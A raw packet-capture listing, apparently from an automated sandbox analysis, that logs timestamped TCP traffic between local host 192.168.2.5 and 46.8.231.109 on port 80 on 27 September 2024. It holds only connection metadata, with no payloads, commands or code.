Sep 27, 2024 00:15:07.331197023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331197023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331218004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331228971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331263065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331295967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331312895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331312895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331329107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331366062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331368923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331368923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331408978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331419945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331454039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331485987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331487894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331516027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331517935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331537008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331549883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331583023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331594944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331594944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331614971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331640005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331649065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331698895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331698895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332545042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332597017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332616091 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332631111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332662106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332676888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332676888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332694054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332710028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332743883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332777023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332784891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332808971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332823038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332823038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332859039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332864046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332890987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332912922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332923889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332942963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332957029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332963943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332963943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332971096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332983971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.332984924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.332999945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333017111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333019018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333033085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333045959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333060980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333074093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333087921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333092928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333101988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333108902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333108902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333108902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333136082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333162069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333174944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333189011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333219051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333239079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333265066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333278894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.333359957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.333359957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335549116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335561991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335577011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335634947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335644007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335656881 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335659027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335673094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335688114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335705042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335705042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335740089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335771084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335794926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335808992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335817099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335824013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335839033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335845947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335853100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335867882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.335879087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335879087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335906982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.335988045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336002111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336015940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336030006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336044073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336045027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336055994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336083889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336136103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336148977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336163044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336177111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336191893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336200953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336200953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336208105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336234093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336277962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336354971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336369038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336383104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336395979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336399078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336410999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336412907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336441994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336441994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336551905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336574078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336587906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336601973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336611032 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336617947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336632013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336633921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336647034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336662054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336677074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336677074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336677074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336689949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336704016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336716890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336730957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336733103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336733103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336745977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.336770058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336786985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.336996078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.337008953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.337023973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.337040901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.337057114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.337091923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.337091923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418241024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418261051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418276072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418320894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418334961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418349028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418363094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418390036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418498039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418498993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418513060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418528080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418540955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418555975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418569088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418576002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418576002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418584108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418601036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418625116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418739080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418754101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418766975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418781042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418797970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418798923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418812037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418823004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418838024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418843985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418852091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418867111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418878078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418880939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418900013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418910027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.418971062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.418992043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419009924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419013023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419013023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419043064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419043064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419084072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419096947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419111967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419126034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419140100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419152975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419162989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419162989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419162989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419167042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419189930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419205904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419238091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419253111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419265985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419282913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419311047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419311047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419609070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419621944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419636011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419651031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419656992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419656992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419665098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419673920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419680119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419692039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419706106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419717073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419717073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419720888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419730902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419734955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419749022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419756889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419764042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419785976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419797897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419799089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419799089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419811964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419826031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419838905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419853926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419853926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419888020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419888020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419919968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419934988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419948101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419965029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.419976950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419976950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.419991970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420003891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420017004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420031071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420042992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420042992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420044899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420057058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420059919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420073986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420094967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420105934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420105934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420110941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.420156956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.420156956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422420025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422491074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422525883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422538996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422550917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422560930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422560930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422561884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422574043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422585011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422588110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422588110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422595978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422615051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422625065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422636032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422641039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422641039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422645092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422657013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422667027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422677994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422678947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422720909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422720909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422734976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422745943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422756910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422794104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422794104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422852993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422864914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422874928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422884941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422895908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422919989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422919989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422945023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.422946930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422959089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.422986984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423003912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423007965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423015118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423079014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423079014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423109055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423119068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423130989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423135996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423146963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423165083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423165083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423202038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423283100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423294067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423302889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423314095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423325062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.423327923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.423335075 CEST	80	49708	46.8.231.109	192.168.2.5
